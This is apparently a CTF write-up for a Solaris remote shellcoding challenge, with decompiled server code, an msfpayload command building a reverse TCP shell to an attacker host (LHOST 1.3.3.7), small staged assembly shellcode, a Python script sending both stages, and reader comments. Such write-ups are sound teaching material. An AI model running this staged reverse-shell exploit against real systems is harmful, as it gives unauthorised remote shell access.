This challenge was on remote exploiting. The binary is for SunOS (Solaris).
Summary: shellcoding challenge
The program is a simple forking tcp server with the following client callback function:
int __cdecl client_callback(int fd) { int n; char buf[4]; void (*shellcode)(void); // [sp+18h] [bp-20h]@1 ... shellcode = buf + 1; n = read_bytes(fd, buf, 73); printf("read %d bytes\n\n\n", n); shellcode(); return 0; }
Ok we have 72 bytes for shellcode, let’s look at metasploit’s reverse_tcp_shell:
$ msfpayload solaris/x86/shell_reverse_tcp LHOST=1.3.3.7 \ LPORT=3123 R>payload $ wc payload 0 3 91 payloadtest
Ohhh, 91 byte. Too many… We need staged shellcode. Let’s write a small one, which reads another shellcode and executes it. A good thing is that we can get socket descriptor from the stack – it’s first argument for the client_callback so it’s at [ebp+8]. Also we can use function read_bytes(...):
use32 mov esi, ebp ; place for shellcode push 0x7f ; len push esi ; buffer push dword [ebp + 8] ; socket fd call far ptr 0x08051104 ; read_bytes call esi ; call shellcode
Compile it with fasm and send to server:
SC1 = open("sh.bin").read().rjust(73, "\x90") SC2 = open("payload").read() f = socket.socket(socket.AF_INET, socket.SOCK_STREAM) f.connect(("140.197.212.184", 5555)) f.send(SC1) time.sleep(1) f.send(SC2)
Then catch a shell with listening netcat and get the key.
The flag: wh0thefuck_USES_solarisanyway?!
4 comments
Skip to comment form
Hi,
Thanks for the walk though, ive just got one question… how do you reverse a binary to C code ?
Author
IDA with hexrays :) And then renaming and retyping vars and funcs with guessing/analyzing
Thanks for your response , gotta get myself a copy.Cheers
@hellman you damn pirate! :D